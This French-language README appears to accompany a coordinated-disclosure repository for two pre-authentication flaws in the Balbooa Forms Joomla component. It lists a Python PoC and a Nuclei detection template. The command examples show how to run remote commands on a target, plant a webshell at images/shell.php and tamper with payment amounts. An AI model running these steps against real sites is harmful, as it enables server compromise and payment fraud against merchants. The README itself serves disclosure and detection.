
PoC et modèles de détection pour RCE pré-authentification et falsification de paiement dans Balbooa Forms (Joomla), incluant un exploit Python et un modèle de détection Nuclei.
PoC et modèles de détection pour deux vulnérabilités pré-auth dans Balbooa Forms (com_baforms) pour Joomla, corrigées dans la version 2.4.3.2.
Découvertes par Lulztigre, divulgation coordonnée via la Joomla Security Strike Team (JSST), publiées le 2026-08-19. Article complet : https://lulztigre.pw/posts/balbooa-forms-penny-rce-67363-67364.html
| Fichier | Objectif |
|---|
balbooa_forms_poc.py | PoC Python, uniquement bibliothèque standard, couvre les deux CVE |
CVE-2026-67364.yaml | Modèle Nuclei, détection non destructive de la RCE par eval |
Zéro dépendance (Python 3.8+). Les modes rce et detect n'écrivent aucun fichier et ne déclenchent
aucun débit réel ; shell et pay sont facultatifs et destinés à une utilisation en laboratoire.
# 1. Trouver une paire (form-id, submit-btn) vulnérable. Non destructif : chaque sonde est une
# soumission anonyme avec une charge utile de marqueur d'écho.
python3 balbooa_forms_poc.py http://target detect --form-max 3 --btn-max 10
# 2. Prouver l'exécution de commandes. La sortie est renvoyée dans la réponse HTTP, sans persistance.
python3 balbooa_forms_poc.py http://target rce --form 1 --btn 7 --cmd id
# 3. Preuve classique de webshell (laboratoire uniquement - écrit images/shell.php)
python3 balbooa_forms_poc.py http://target shell --form 1 --btn 7
# 4. Altération du montant de paiement (laboratoire uniquement - déclenche de VRAIES tentatives de débit ; nécessite --authorize)
python3 balbooa_forms_poc.py http://target pay --authorize --total 0.01
Code de sortie 0 = vulnérable/exploité, 1 = sain ou échec, 2 = erreur d'utilisation.
Remarques :
[URL parameter = X], et aucun reCAPTCHA sur le bouton.--insecure ignore la vérification TLS pour les cibles HTTPS avec des certificats auto-signés.Détection uniquement : extrait le jeton CSRF anonyme, puis balaie de petites plages form/btn avec une charge utile de marqueur d'écho et fait correspondre le marqueur dans la réponse. Aucun fichier écrit, aucun débit réel déclenché.
nuclei -t CVE-2026-67364.yaml -u http://target -v
Vérifié avec nuclei v3.11.1 (Windows + Linux) : extraction du jeton, balayage de 30 paires
(form-id 1..3 x submit-btn 1..10, clusterbomb), 1 correspondance critique sur la paire vulnérable.
Ajoutez -duc sur les machines hors ligne pour ignorer la vérification de mise à jour. Le balayage est volontairement
réduit ; augmentez les plages de charges utiles si une cible héberge plus de formulaires. L'altération de paiement (CVE-2026-67363)
n'est volontairement PAS automatisée dans nuclei : chaque sonde est une véritable tentative de débit contre la
passerelle du marchand.
Utilisez uniquement contre des systèmes que vous êtes autorisé à tester.